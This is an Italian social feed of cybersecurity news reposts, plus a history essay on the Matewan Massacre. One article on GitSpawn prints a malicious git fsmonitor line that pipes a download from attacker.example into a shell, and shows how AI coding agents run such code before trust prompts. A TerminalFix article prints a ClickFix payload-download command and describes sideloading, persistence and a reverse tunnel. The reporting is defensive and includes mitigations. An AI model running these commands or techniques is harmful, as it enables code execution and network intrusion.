The Pirate Post ha ricondiviso questo.

✊🏽 Providing safe, secure and independent internet infrastructure is not a crime. EDRi stands in full solidarity with Autistici/Inventati @cavallette after the US government designated the Italian non-profit organisation as a "Specially Designated Global Terrorist."

This targeting of A/I is also an attack on fundamental rights, safe and secure communications, anti-authoritarian organising and the democratic integrity of the EU.

Our full statement ➡️ edri.org/our-work/edri-solidar…

Questa voce è stata modificata (1 settimana fa)
in reply to EDRi

Secondo alcuni statunitensi le sanzioni a @cavallette sono giuste perché creano servizi utili a brava gente ma anche a chi (secondo loro) non lo è. Prendiamolo per vero. Leonardo e Beretta fabbricano cose utili (secondo alcuni) a brava gente ma anche a cattiva. Le sanzioniamo? Idem Lockheed Martin, Northrop Grumman, ... Sanzioniamo pure loro? Gli USA hanno inventato e prodotto la bomba atomica che non è dual use. Fa solo omicidi di massa. Quando inizieremo a sanzionare gli USA?
The Pirate Post ha ricondiviso questo.

The media in this post is not displayed to visitors. To view it, please go to the original post.

GitSpawn Turns Booby-Trapped Repositories Into Silent Code Execution Across AI Coding Tools
#CyberSecurity
securebulletin.com/gitspawn-tu…
The Pirate Post ha ricondiviso questo.

The media in this post is not displayed to visitors. To view it, please go to the original post.

New WhatsApp Video Call Trick Bypasses Android Lock Screens to Expose Your Photos
#CyberSecurity
securebulletin.com/new-whatsap…
The Pirate Post ha ricondiviso questo.

The media in this post is not displayed to visitors. To view it, please go to the original post.

Lenovo ID Trust Flaw Opened About 5,000 Dropbox Accounts to Takeover
#CyberSecurity
securebulletin.com/lenovo-id-t…
The Pirate Post ha ricondiviso questo.

The media in this post is not displayed to visitors. To view it, please go to the original post.

Microsoft 365 Session Hijacking Campaigns Hide Behind Trusted Remote-Support Tools
#CyberSecurity
securebulletin.com/microsoft-3…
The Pirate Post ha ricondiviso questo.

The media in this post is not displayed to visitors. To view it, please go to the original post.

Fake Software Installers Are Quietly Disarming Microsoft Defender in New Silver Fox Campaign
#CyberSecurity
securebulletin.com/fake-softwa…
The Pirate Post ha ricondiviso questo.

The media in this post is not displayed to visitors. To view it, please go to the original post.

TukTuk Malware Gives Ransomware Crews Cross-Platform Control and EDR-Killing Tools
#CyberSecurity
securebulletin.com/tuktuk-malw…
The Pirate Post ha ricondiviso questo.

The media in this post is not displayed to visitors. To view it, please go to the original post.

SharePoint sotto attacco: la catena RCE non autenticata CVE-2026-55040 + CVE-2026-63520
#tech
spcnet.it/sharepoint-sotto-att…
@informatica


SharePoint sotto attacco: la catena RCE non autenticata CVE-2026-55040 + CVE-2026-63520


Una catena di due CVE trasforma SharePoint in un bersaglio non autenticato


Ad agosto 2026 Rapid7 e VulnCheck hanno pubblicato, in tempi ravvicinati, l’analisi tecnica di una catena di exploit che colpisce Microsoft SharePoint Server on-premises con impatto massimo: esecuzione di codice remoto senza alcuna autenticazione. La catena combina due vulnerabilità distinte, CVE-2026-55040 (bypass di autenticazione JWT, CVSS 9.1) e CVE-2026-63520 (istanziazione insicura di tipi .NET nel motore Business Data Connectivity), e secondo Shadowserver oltre 8.700 server SharePoint risultano ancora esposti direttamente su Internet. Per chi gestisce infrastrutture SharePoint on-prem non si tratta di un bollettino da archiviare: è una delle catene di attacco più pericolose viste sulla piattaforma dai tempi di ToolShell.

CVE-2026-55040: quando il token JWT non prova più nulla


Il primo anello della catena riguarda la pipeline di validazione dei token JWT usati internamente da SharePoint per l’autenticazione tra servizi. A causa di controlli insufficienti su questi token, un attaccante che conosca in anticipo l’identità di un utente target (tramite il suo SID di Active Directory o il suo UPN, entrambi spesso enumerabili o prevedibili in ambienti aziendali) può forgiare un token valido e impersonarlo senza fornire alcuna credenziale. Il risultato è un bypass completo dell’autenticazione: l’attaccante entra nel sistema con l’identità di un utente legittimo, potenzialmente un amministratore.

Da sola, questa vulnerabilità (classificata CWE-1390, “Weak Authentication”) sarebbe già critica. Ma è il punto di ingresso che rende possibile il secondo, ben più devastante, stadio della catena.

CVE-2026-63520: RCE tramite Business Data Connectivity


Il secondo CVE affligge il sottosistema Business Data Connectivity (BDC) di SharePoint, che permette di collegare fonti dati esterne tramite modelli descritti in file XML con estensione .bdcm. La causa radice è un’istanziazione di tipi .NET non sufficientemente validata nella classe DbTypeReflector: il metodo ResolveDotNetType() chiama direttamente Type.GetType() su un valore TypeName controllato dall’attaccante, senza un controllo efficace. Il filtro di sicurezza esistente si limitava a bloccare nomi di tipo corti, ma nomi di tipo superiori ai 15 caratteri bypassavano il controllo, aprendo la porta a qualunque tipo .NET disponibile nella Global Assembly Cache (GAC).

In pratica, un attaccante autenticato (o, dopo il bypass JWT, di fatto chiunque) può caricare un file BDCM appositamente costruito che definisce un LobSystem, un’Entity e un MethodInstance di tipo Finder. Quando SharePoint valuta una External List collegata a quel modello, il Finder viene eseguito automaticamente. I ricercatori hanno dimostrato più catene di gadget funzionanti, tra cui una basata su System.Windows.Data.ObjectDataProvider combinato con System.Diagnostics.Process per l’esecuzione diretta di comandi, e una variante che sfrutta System.Web.UI.LosFormatter.Deserialize() con un gadget TypeConfuseDelegate codificato in Base64 per innescare la deserializzazione insicura. Un semplice payload di prova può lanciare calc.exe sul server con i privilegi dell’account di servizio di SharePoint; in produzione, lo stesso meccanismo consente l’esecuzione di codice arbitrario, inclusi payload di post-exploitation completi.

La catena completa: da zero credenziali a RCE


Concatenando le due vulnerabilità, un attaccante che conosce solo lo UPN o il SID di un account SharePoint può:

  1. Forgiare un token JWT valido sfruttando CVE-2026-55040, ottenendo un contesto di autenticazione senza credenziali reali;
  2. Usare quel contesto per caricare un modello BDC malevolo e sfruttare CVE-2026-63520;
  3. Ottenere esecuzione di codice remoto con i privilegi dell’account applicativo di SharePoint, tipicamente con accesso ampio al farm e, a cascata, ad Active Directory.

È esattamente questo l’aspetto che ha spinto VulnCheck a pubblicare i dettagli tecnici in anticipo rispetto all’embargo standard di 30 giorni: un PoC pubblico era già in circolazione e la finestra di rischio per i server non patchati si stava riducendo rapidamente. Bleeping Computer e SecurityAffairs hanno successivamente confermato tentativi di sfruttamento attivo in the wild, mentre la società di threat intelligence Defused ha osservato attività di ricognizione sistematica contro honeypot SharePoint esposti.

Versioni affette e patch disponibili


Microsoft ha rilasciato aggiornamenti dedicati per tutte le edizioni supportate on-premises:

  • SharePoint Server Subscription Edition: KB5002882, build 16.0.19725.20434
  • SharePoint Server 2019: KB5002883, build 16.0.10417.20175
  • SharePoint Enterprise Server 2016: KB5002891, build 16.0.5561.1001

SharePoint Online (Microsoft 365) non è interessato: il rischio riguarda esclusivamente le installazioni on-premises. Se gestite un farm SharePoint self-hosted, la priorità è applicare queste patch ora, non nella prossima finestra di manutenzione pianificata.

Cosa fare subito, in pratica


Oltre al patching, che resta la contromisura primaria e non negoziabile, alcune azioni concrete per ridurre l’esposizione e rilevare eventuali compromissioni:

  • Inventariare i server esposti: verificate quali istanze SharePoint sono raggiungibili direttamente da Internet e valutate se sia davvero necessario, oppure se possano essere posizionate dietro un reverse proxy con autenticazione aggiuntiva o una VPN.
  • Controllare la build corrente: dalla Central Administration o via PowerShell (Get-SPFarm | Select BuildVersion) verificate che i server siano allineati alle build patchate elencate sopra.
  • Monitorare i log IIS e ULS per pattern di autenticazione anomali (token JWT sospetti, accessi con identità che normalmente non generano traffico da quell’origine) e per upload o modifiche di modelli BDC non pianificati.
  • Verificare le configurazioni Business Connectivity Services: se il farm non usa BDC/BCS in modo attivo, valutate se disabilitare il servizio riduce la superficie d’attacco senza impatti operativi.
  • Applicare il principio del minimo privilegio agli account di servizio di SharePoint, così da limitare il “raggio d’azione” di un’eventuale esecuzione di codice riuscita.

La combinazione di autenticazione bypassabile e deserializzazione insicura è un pattern che SharePoint ha già visto in passato (basti pensare a ToolShell nel 2025), e che continua a ripresentarsi perché il BDC/BCS resta un componente ricco di superficie d’attacco poco monitorato rispetto ad altre parti della piattaforma. Vale la pena, in generale, trattare ogni funzionalità di connettività dati esterna come un potenziale vettore di deserializzazione e sottoporla a hardening a prescindere dal CVE del momento.

Fonte originale: Petri IT Knowledgebase – SharePoint Exploit Code Puts Thousands of Internet-Facing Servers At Risk. Analisi tecnica aggiuntiva: Rapid7 su CVE-2026-55040, Rapid7 su CVE-2026-63520 e VulnCheck.


The Pirate Post ha ricondiviso questo.

The media in this post is not displayed to visitors. To view it, please go to the original post.

BREEZE COMET Hackers Use AI-Written Tools to Speed-Run Brazilian Bank Fraud
#CyberSecurity
securebulletin.com/breeze-come…
The Pirate Post ha ricondiviso questo.

The media in this post is not displayed to visitors. To view it, please go to the original post.

GitSpawn: come un file .git/config trasforma i tuoi agenti AI in un vettore RCE
#tech
spcnet.it/gitspawn-come-un-fil…
@informatica


GitSpawn: come un file .git/config trasforma i tuoi agenti AI in un vettore RCE


Il problema non è nel modello AI, ma nell’idraulica sotto di esso


I ricercatori di Manifold Security hanno pubblicato a inizio settembre 2026 una ricerca chiamata GitSpawn che identifica una classe di vulnerabilità presente in sette diversi agenti AI per lo sviluppo software: Claude Code, OpenAI Codex CLI, Cursor, goose, Hermes Agent, Qwen Code e Grok Build. In totale sono stati individuati otto difetti distinti, quattro dei quali ancora privi di patch al momento della pubblicazione. Il dato che rende la scoperta rilevante non è tanto la quantità di strumenti coinvolti, quanto la sua causa: come sintetizzano gli stessi ricercatori, “la vulnerabilità non è nel modello, né in qualcosa di nuovo: è nell’ordinaria idraulica sottostante”. Il colpevole è una funzionalità Git vecchia di anni, pensata per le performance, non per la sicurezza.

core.fsmonitor: da ottimizzazione a primitiva di code execution


core.fsmonitor è un’impostazione Git legittima, pensata per velocizzare comandi come git status su repository di grandi dimensioni: il suo valore può essere il percorso di un comando esterno che Git invoca per sapere quali file sono cambiati, evitando una scansione completa del filesystem. È una funzionalità comoda e ampiamente documentata, il cui rischio in ambito “solo umano” è mitigato dal fatto che un normale git clone non porta con sé la configurazione locale del repository sorgente: .git/config non viene propagato dal clone remoto, quindi un repository malevolo scaricato normalmente da GitHub non può iniettare questa impostazione.

Il problema nasce quando un repository arriva sul filesystem non tramite clone, ma con la directory .git già intatta: un archivio ZIP scaricato ed estratto, una cartella condivisa via unità di rete, una chiavetta USB, un backup ripristinato, un progetto trasferito via cloud sync. In tutti questi casi .git/config arriva integro, comprese eventuali righe malevole come:

[core]
    fsmonitor = "sh -c 'curl attacker.example/payload | sh'"

Gli agenti AI da riga di comando eseguono di routine comandi Git in background non appena aprono una cartella di lavoro — tipicamente git status o git diff — per orientarsi sul branch corrente e sui file modificati, così da costruire il contesto del progetto prima ancora di interagire con l’utente. Proprio questa esecuzione automatica di comandi Git è ciò che innesca core.fsmonitor, ed è ciò che lo rende, esattamente, pericoloso: il comando configurato viene eseguito con i pieni privilegi dell’utente collegato, fuori dalla sandbox dell’agente, senza alcuna richiesta di conferma.

Perché il timing è la parte più insidiosa


La ricerca di Manifold Security evidenzia che, in diversi agenti, l’esecuzione avviene prima di qualunque barriera di sicurezza pensata per proteggere proprio da questo tipo di scenario:

  • prima del prompt di “trust del workspace” (Claude Code, Hermes Agent);
  • prima dell’autenticazione dell’utente (Qwen Code);
  • prima ancora del primo tasto premuto nell’interfaccia (Grok Build).

In altre parole, aprire semplicemente una cartella con un agente AI — anche solo per “dare un’occhiata” a un progetto ricevuto — può bastare a innescare l’esecuzione del payload, senza che l’utente abbia dato alcun consenso esplicito all’agente di operare su quel repository.

Non solo fsmonitor: hook e filtri come vettori paralleli


Oltre a core.fsmonitor, i ricercatori segnalano altre impostazioni Git sfruttabili con lo stesso schema: core.hooksPath, che permette di ridirigere Git verso una directory di hook arbitraria, e le direttive attr.tree con filtri clean/process, che possono eseguire comandi durante normali operazioni sui file tracciati. Nel caso di goose, ad esempio, il comando goose review disattivava selettivamente una singola opzione di configurazione pericolosa (-c core.quotePath=off) senza però filtrare le altre, lasciando comunque una superficie sfruttabile.

Stato delle patch (settembre 2026)

AgenteVersioni coinvolteStato
goose< 1.44.0Patchato (CVE-2026-72718, CVSS 7.0)
Codex CLI0.102.0 – 0.130.0Patchato in 0.131.0+ (CVE-2026-19592)
Cursorvarie build CLIPatchato
Claude Code2.1.193+Parzialmente patchato in 2.1.196+ (CVE-2026-55607); una variante “ultrareview” risultava ancora presente in 2.1.258
Hermes Agent0.18.2, 0.21.0Non patchato (CVE-2026-71963, vendor non responsivo)
Qwen Code0.19.6, 0.22.3Non patchato
Grok Build0.2.93, 1.0.13Non patchato

Al momento della pubblicazione non risultano exploit documentati attivamente sfruttati in the wild, e nessun CVE della classe GitSpawn compare nel catalogo CISA KEV. Vale però la pena notare che scoperte indipendenti e parallele — da Sonar già ad aprile 2026 su Claude, e da OpenAI stessa il 2 settembre 2026 con l’assegnazione di tre CVE distinti su Codex — confermano che non si tratta di un caso isolato, ma di una debolezza sistemica nel modo in cui gli agenti CLI-based interagiscono con Git all’avvio.

Mitigazioni pratiche per sviluppatori e team DevOps


In attesa che tutti i vendor completino le patch, alcune contromisure applicabili subito:

  • Disattivare globalmente core.fsmonitor se non lo usate attivamente, così che nessuna configurazione locale di un repository possa riattivarlo silenziosamente:
    git config --global core.fsmonitor false
  • Verificare la presenza di configurazioni sospette prima di aprire un repository ricevuto per file (ZIP, USB, unità condivisa) con un agente AI:
    git config --global --list | grep fsmonitor
    git config --get core.fsmonitor
    git config --get core.hooksPath
  • Ispezionare manualmente .git/config di ogni repository ricevuto in questo modo, cercando in particolare core.fsmonitor, core.hooksPath e blocchi attr.tree con filtri clean/process prima di aprirlo con qualunque strumento, non solo con un agente AI.
  • Preferire sempre il clone via URL remoto invece di scompattare archivi o copiare cartelle .git intatte da fonti non verificate: è la barriera più semplice ed efficace, perché .git/config del remoto non viene mai trasferito da un clone standard.
  • Aggiornare gli agenti CLI alle ultime versioni disponibili e monitorare gli advisory dei rispettivi vendor, dato che lo stato delle patch resta disomogeneo e in evoluzione.
  • Per i team che integrano questi agenti in pipeline CI/CD, eseguire i comandi Git di background con override esplicito, ad esempio git -c core.fsmonitor=false status, per ridurre la superficie indipendentemente dalla configurazione locale del repository.


Perché riguarda anche voi, se non usate ancora agenti AI per il codice


GitSpawn è un promemoria di un principio più generale: ogni volta che uno strumento — sia un IDE, un CI runner o un agente AI — esegue comandi Git “di cortesia” per raccogliere contesto, sta implicitamente fidandosi della configurazione locale di un repository che potrebbe non aver mai scelto di clonare. Con la crescente adozione di agenti AI capaci di eseguire comandi in autonomia sul filesystem locale, questa fiducia implicita diventa un vettore di attacco concreto, non solo teorico. Vale la pena rivedere, anche nei propri script di automazione e negli ambienti di sviluppo condivisi, quali strumenti eseguono comandi Git non richiesti esplicitamente dall’utente, e blindare quel percorso a prescindere dal CVE del giorno.

Fonte originale: The Hacker News – Malicious .git Configs Can Make Claude, Codex, Cursor, and Other AI Agents Run Attacker Code. Ricerca tecnica: Cyber Security News – GitSpawn Flaws Let Malicious Repositories Execute Code (Manifold Security).


The Pirate Post ha ricondiviso questo.

The media in this post is not displayed to visitors. To view it, please go to the original post.

High-Severity Cleo Harmony Bug Lets Attackers Forge Their Way to Admin Access
#CyberSecurity
securebulletin.com/high-severi…

Bastian’s Night #492 September, 3rd


Every Thursday of the week, Bastian’s Night is broadcast from 21:30 CEST/DST.

Bastian’s Night is a live talk show in German with lots of music, a weekly round-up of news from around the world, and a glimpse into the host’s crazy week in the pirate movement.


If you want to read more about @BastianBB: –> This way


piratesonair.net/bastians-nigh…

Elezioni e Politica 2026 reshared this.

The Pirate Post ha ricondiviso questo.

The media in this post is not displayed to visitors. To view it, please go to the original post.

TerminalFix: come funziona l’attacco ClickFix con falsi CAPTCHA Cloudflare (e come difendersi)
#tech
spcnet.it/terminalfix-come-fun…
@informatica


TerminalFix: come funziona l’attacco ClickFix con falsi CAPTCHA Cloudflare (e come difendersi)


Da fine agosto 2026 Microsoft Threat Intelligence sta monitorando una campagna che porta il nome interno di TerminalFix: una variante evoluta della tecnica ClickFix, in cui l’utente viene convinto a “risolvere” da solo una verifica anti-bot incollando ed eseguendo un comando nel terminale di Windows. A differenza delle precedenti ondate ClickFix, che si limitavano a piazzare un infostealer, questa campagna costruisce una catena multi-stadio con DLL sideloading, steganografia e un tunnel di rete inverso completo. Per chi gestisce endpoint aziendali è un caso di studio da conoscere a fondo, perché la superficie di attacco non è una vulnerabilità software, ma il comportamento umano davanti a un prompt che sembra legittimo.

Cos’è la tecnica ClickFix e perché funziona ancora


ClickFix sfrutta un principio semplice: gli utenti sono ormai abituati a superare verifica CAPTCHA, quindi un overlay che imita Cloudflare Turnstile o un servizio simile non desta sospetti. La particolarità è che l’overlay non chiede di cliccare una casella, ma guida la vittima a premere Win+R, incollare un comando (già copiato negli appunti dal sito malevolo tramite JavaScript) e premere Invio. In questo modo l’attaccante bypassa i controlli sui download dai browser: non c’è un eseguibile da salvare e aprire, solo testo incollato in una finestra di dialogo che l’utente stesso avvia.

La catena di attacco di TerminalFix, passo dopo passo


Secondo l’analisi pubblicata da Microsoft Security, la campagna si sviluppa in otto fasi distinte, orchestrate per restare sotto la soglia di rilevamento della maggior parte degli endpoint protection tradizionali.

1. Il sito compromesso e il falso Cloudflare


La vittima visita un sito legittimo ma compromesso (uno degli indicatori è linked-log[.]com) che mostra un overlay identico a una verifica Cloudflare Turnstile. Lo script della pagina cancella il terminale e stampa un messaggio del tipo “Starting Cloudflare verification…”, mentre il comando PowerShell malevolo finisce già negli appunti dell’utente.

2. Download ed estrazione


Il comando incollato scarica un archivio ZIP e lo estrae in una sottocartella casuale di C:\ProgramData, ad esempio:

Invoke-WebRequest -Uri hxxps://gitnow[.]dev/payload.zip -OutFile $env:TEMP\p.zip
Expand-Archive $env:TEMP\p.zip -DestinationPath C:\ProgramData\f47f2a8c21c9df4e

Un file batch nella stessa cartella viene lanciato in modo silenzioso, avviando la fase successiva.

3. DLL sideloading su un binario firmato Microsoft


Qui la campagna mostra la sua sofisticazione: il file batch esegue LockScreenContentServer.exe, un eseguibile Windows legittimo e firmato digitalmente, che al lancio cerca automaticamente dui70.dll nella propria directory prima di controllare System32. L’attaccante sfrutta esattamente questo ordine di ricerca (T1574.001 nel framework MITRE ATT&CK) piazzando una DLL malevola con lo stesso nome accanto al binario firmato. Il codice malevolo parte quindi “dentro” un processo attendibile agli occhi di qualsiasi soluzione basata su reputazione del file firmatario.

4. Steganografia: payload nascosti in immagini PNG


La DLL scarica una o più immagini PNG da server come bestsocialmedianewspapper[.]com ed estrae dati binari nascosti nei canali RGBA dei pixel, con i primi 8 byte che codificano la lunghezza del payload come intero a 64 bit. Suddividere il payload su più immagini rende ancora più difficile il rilevamento a livello di rete, dato che il traffico appare come un semplice download di immagini verso un CDN qualunque.

5. Persistenza doppia


Il malware si assicura la sopravvivenza al riavvio tramite due meccanismi paralleli: una chiave in HKCU\...\Run e un’attività pianificata che rilancia l’eseguibile ogni 60 minuti. La ridondanza serve a resistere anche a una bonifica parziale.

6. Ricognizione dell’ambiente Active Directory


Una volta stabilito, lo script effettua enumerazione del dominio (trust, domain admin), ping sweep dei server interni e raccolta di informazioni di sistema, il tutto orientato a mappare controller di dominio, database, server di backup, gateway e sistemi di posta come obiettivi di movimento laterale.

7-8. Loop di comando e tunnel inverso


Un ciclo di file-watch controlla periodicamente un file di testo per nuovi comandi, li esegue con Invoke-Expression e ne salva l’output. Il collegamento con l’infrastruttura dell’attaccante avviene tramite una copia ufficiale di Python 3.14.5, lanciata con pythonw.exe per restare invisibile, che esegue uno script client custom (client.py). Questo implant stabilisce una connessione TLS con upgrade a WebSocket verso gitnow[.]dev:443 e implementa un proxy TCP in stile SOCKS5: l’attaccante può quindi istruire l’implant a connettersi a qualsiasi host interno raggiungibile dalla macchina compromessa, di fatto trasformandola in un pivot verso la rete aziendale. Lo script ruota anche gli User-Agent tra Chrome, Firefox e Safari per confondersi con il traffico normale.

Indicatori di compromissione principali


  • Domini C2/hosting: gitnow[.]dev (tunnel, porta 443), bestsocialmedianewspapper[.]com (hosting steganografico), offlineupdater[.]com (failover), linked-log[.]com (sito compromesso)
  • Processo abusato: LockScreenContentServer.exe in esecuzione da percorsi non standard (es. C:\ProgramData\...)
  • DLL malevola: dui70.dll caricata tramite sideloading (nove varianti hash osservate)
  • Rilevamenti Microsoft Defender: Trojan:Win32/ClickFix.*, Trojan:Win32/TermFix.*, Trojan:Win64/DLLHijack.DAB!MTB, Trojan:Python/Indigo.SA


Come proteggere l’infrastruttura: checklist operativa


Microsoft e diversi ricercatori indipendenti convergono su un set comune di contromisure, applicabili sia con Microsoft Defender che con altri stack EDR:

  • Restringere l’esecuzione di PowerShell con AppLocker o Windows Defender Application Control, limitando gli script non firmati e abilitando il Constrained Language Mode per gli utenti standard.
  • Controllare o disabilitare la finestra Esegui (Win+R) tramite policy per gli utenti che non ne hanno necessità operativa, riducendo drasticamente la superficie di attacco di ClickFix.
  • Monitorare l’esecuzione di binari LOLBin firmati (come LockScreenContentServer.exe) da percorsi anomali quali ProgramData o Temp, non dalla loro directory di sistema abituale.
  • Abilitare lo script block logging di PowerShell (Event ID 4104) per avere visibilità sui comandi effettivamente eseguiti, non solo sul processo lanciato.
  • Attivare le regole ASR (Attack Surface Reduction) che bloccano script offuscati, eseguibili poco diffusi/nuovi e il lancio di contenuti scaricati da JavaScript/VBScript.
  • Configurare Windows Terminal per avvisare su incollaggi multi-riga, così da rompere l’automatismo copia-incolla-invio su cui si basa l’intera catena.
  • Formare gli utenti spiegando esplicitamente che nessuna verifica CAPTCHA legittima richiede mai di aprire un terminale o una finestra di esecuzione comandi.
  • Se vengono rilevati indicatori della campagna, trattare l’host come compromesso a livello di rete: ruotare le credenziali usate su quella macchina (comprese quelle di dominio se sono state inserite) e verificare eventuali connessioni SOCKS anomale verso l’esterno.


Conclusione


TerminalFix conferma una tendenza che i sistemisti dovrebbero già avere sul radar: le tecniche di social engineering come ClickFix non sono più un problema “consumer” legato a infostealer opportunistici, ma vengono usate come testa di ponte per intrusioni enterprise complete, con ricognizione Active Directory e accesso di rete persistente. Il punto debole non è tecnico ma comportamentale, ed è proprio per questo che i controlli più efficaci — blocco di PowerShell non firmato, restrizioni su Win+R, logging degli script — vanno applicati indipendentemente dal fatto che l’endpoint protection riconosca o meno la specifica variante del giorno.

Fonte: Microsoft Security Blog – “TerminalFix campaign deploys reverse tunnel through multistage intrusion”


The Pirate Post ha ricondiviso questo.

☕ CYBERBRIEFING MATTUTINO — Giovedì 3 settembre 2026

👉 Leggi tutti gli aggiornamenti delle ultime 24 ore:
ilpuntocyber.rfeed.it/article.…

#newsletter #cybersecurity
@informatica

The Pirate Post ha ricondiviso questo.

The media in this post is not displayed to visitors. To view it, please go to the original post.

Critical Artifactory Bypass Is Being Used to Mint Administrator Tokens
#CyberSecurity
securebulletin.com/critical-ar…
The Pirate Post ha ricondiviso questo.

The media in this post is not displayed to visitors. To view it, please go to the original post.

Boston Scientific Cyber Incident Disrupts Manufacturing and Device Shipments
#CyberSecurity
securebulletin.com/boston-scie…
The Pirate Post ha ricondiviso questo.

The media in this post is not displayed to visitors. To view it, please go to the original post.

Fake Teams Help-Desk Calls Turn Remote Support Into a Path Toward Domain Control
#CyberSecurity
securebulletin.com/fake-teams-…
The Pirate Post ha ricondiviso questo.

The media in this post is not displayed to visitors. To view it, please go to the original post.

Attackers Exploit Critical Langflow and Rails Flaws to Hunt Cloud Secrets
#CyberSecurity
securebulletin.com/attackers-e…

EDRi stands in solidarity with Autistici/Inventati after “terrorist” designation by the US government


The United States government has designated the Italian non-profit organisation Autistici/Inventati as a "Specially Designated Global Terrorist" for providing digital infrastructure to supposedly “violent far-left militants.” This targeting of A/I is also an attack on independent internet infrastructure, fundamental rights of multiple collectives, safe and secure communications, democratic anti-authoritarian organising and the democratic integrity of the EU.

The post EDRi stands in solidarity with Autistici/Inventati after “terrorist” designation by the US government appeared first on European Digital Rights (EDRi).

Elezioni e Politica 2026 reshared this.

Through the Spyglass: Protect and Serve


You see a certain phrase all across police departments everywhere.

Protect and Serve.

You can’t go far without seeing or hearing it.

Protect and Serve.

Banners. Badges. Mugs. Shirts.

Protect and Serve.

The phrase is simple, and it cuts straight to the point. That’s the point of any given police department.

Protect and Serve.

…Right?

That is the point, is it not? If it wasn’t, why would they say it everywhere?

Protect and Serve.

But look at how vague that phrase is. You’d think it’s self-explanatory, but who ultimately is the beneficiary of it?

Protect and Serve.

Yeah, but who? Or what?

Let me take you back for a moment. If we are to answer this question, we should go back to when that question was pushed to the limit.

Let’s start with an answer, one that most would probably default to, and work our way through the story and see if we’re right.

Protect and Serve.

Their community?

Take a step back. The story begins near the Tug Fork River, with one of the most famous feuds in United States history: the Hatfields vs McCoys.

Stolen pigs, affairs, taking turns shedding blood, New Years 1888, the Battle of the Grapevine Creek. You’ve heard all the stories of your father’s cousins; the feuding and the killing.

Step in: your name is Jessie Maynard, and your grandmother was “Ole Randall” McCoy’s cousin and sister-in-law (gross!). It was before your time (the feud had died down before you were born), but the stories would linger forever in the folklore of the United States, let alone in the immediate aftermath of the families directly impacted.

You, naively, may believe the violence your family experienced is behind you.

In 1911, days after your 17th birthday, you marry Cabell Testerman, the twice-divorced 29-year-old jeweler and optician by trade.

While the interfamilial violence may have subsided, there was a whole new dimension to life in Appalachia that was beginning to reveal itself.

The coal industry was about to explode, and so was the movement for labor rights, protections and representation.

The first sign you noticed things will start to get out of hand was perhaps the 15-month-long Paint Creek-Cabin Creek strike, beginning less than a year after your wedding in April 1912.

Happening just a few counties over in Southern West Virginia, you hear about these “Baldwin-Felts” agents who were called in to be strike breakers, and an Irish-born woman named Mother Jones coming in to assist.

Some papers are calling Jones the “most dangerous woman in America,” but she’s assisting laborers fighting to unionize and having their demands met. How could she be the “most dangerous” when she’s only helping laborers?

After all, she’s not the one putting up snipers or organizing beatings.

These, of course, were happening in company towns across Southern West Virginia. Luckily for you, Matewan is an independent municipality.

You, naively, may believe that type of violence would never come to Matewan.

That Paint Creek-Cabin Creek strike would last until July 1913, ending with the recognition of the union they tried to form.

Good for them!

A year later, you read about the heir to Austria-Hungry getting assassinated in Sarajevo. Some far off European lands. Eventually a whole mess of European Powers are at war with each other.

Typical Europeans, always fighting each other in some war.

This so-called “Great War” in Europe seems to be all the news is talking about. Come 1916, the same year you and Cabell adopt your son Jack, President Wilson is even running on “He kept us out of the war!”

He won! But the Germans were sinking our ships and telling Mexico they should invade us. So, he got us into the war in April 1917, 150 days after the election and only 32 days after his second inauguration.

So much for that promise.

Many men from West Virginia, in your and surrounding counties, were conscripted into the Army to fight that war. They weren’t just miners anymore; they were trained combat veterans.

You hear about that dreaded Russian Empire falling to what the government calls “Bolshevism,” and how we’re sending troops into the Russian Civil War to defeat the “Bolshevik menace.”

Then, something strange happens.

After this Great War ends on the eleventh hour of the eleventh day of the eleventh month in 1918, and our boys began coming home, they still had their pro-unionization aspirations in mind.

But now, the government is calling them “Bolsheviks,” wanting a union “Bolshevism,” and since we’re still fighting Bolshevism in Russia, then it’s somehow patriotic to do that here.

But wait. That can’t possibly be right.

These boys were striking back before the war even started. They were calling Mother Jones “the most dangerous woman in America.” They were always fighting our boys to keep them from unionizing, but now they’re using scare tactics to turn the public against the miners.

These boys just fought a war in Europe the President ran on having kept us out of, and you repay those efforts by calling those men Bolsheviks and unpatriotic?

Those awful Baldwin-Felts strike breakers were always trying to keep these miners from unionizing, and now it just seems like they’re using the convenient excuse of “patriotically fighting Bolsheviks at home” to continue what they’ve been doing this whole time.

Your husband, Cabell, tells you how Albert Felts had the audacity to offer him $500 to allow machine guns to be placed on rooftops in Matewan, as they were carrying out evictions in company housing on the outskirts of Matewan. Hundreds of miners and their families had been evicted from their homes already going into the Spring on 1920.

He tells you what he told Felts: “There wasn’t enough money in the county for him to do something like that.”

His friend and appointed police chief, Sid Hatfield, was offered bribes as well, but stood firmly by his side. Hard living and rough and rumble, Sid might have been a surprising choice to appoint police chief some in town, but he was strong pro-miner and pro-union, as was Cabell himself.

Of course, the irony is not lost on you that a Hatfield is one of your, a McCoy, strongest allies.

Cabell sensing tensions rising, asks you and Sid that, if something were to happen to him, Sid would take care of you and your son.

But surely it couldn’t come to that, right?

Well, come Wednesday, May 19th, 1920, this whole things catches up and collapses right in your lap.

Some Baldwin thugs, including Albert Felts, come through town looking to evict miners in the next town over, and hand Sid Hatfield a warrant for his arrest, allegedly signed by a judge in Mingo county.

Cabell, Sid and Sid’s deputy Fred Burgraff met with the thugs on the porch of the Chambers Hardware Store, with both Sid and the agents claiming they had the right to arrest the other.

Eventually, the warrant for Sid’s arrest landed in your husband’s hands. He declares it to be bogus.

And is promptly shot by Albert Felts, firing the gun from and through his pocket.

Then the shooting began in earnest.

When it was all said and done, a total of ten people would be killed from that day. Albert Felts, his brother Lee, and five other detectives from Baldwin-Felts ended up dead. Two miners from Matewan would also be killed in the gunfire.

But the next day, Cabell becomes the tenth death from the Matewan Massacre, the so-called “Battle of Matewan.”

Only 26 years old and you’ve already been widowed. After your husband’s murder in cold blood, you and your child are left alone. Sid, who was in the middle of the whole affair, swears he will keep his promise to your late husband and take care of you and your son.

And he does.

Sid, less than two weeks after Cabell’s untimely death, goes with you via train to Huntington, WV to get your marriage license. You both decided it was best to get some rest in town before marrying the next day. You two check into the Florentine Hotel to rest up for tomorrow’s wedding.

Then, some unexpected visitors.

Huntington Police Officers Messenger and Vernatt arrest and jail you and Sid overnight for “cohabiting while unmarried” and “committing adultery.” Apparently, you both had folks watching your movements.

Specifically, it was Baldwin-Felts spy (and traitor) Charles Lively and Tom Felts, the brother of the two fallen Felts brothers from the Battle of Matewan, who allegedly left the tip to the Huntington PD.

You have a quick trial in the morning, no longer than five minutes, where the judge ultimately throws away the charges and hefty $10 fine after learning of your and Sid’s plans to wed that same day.

Since you’re already at the courthouse, you guys get to knock out what you aimed to do anyways.

Congratulations, Mrs. Hatfield!

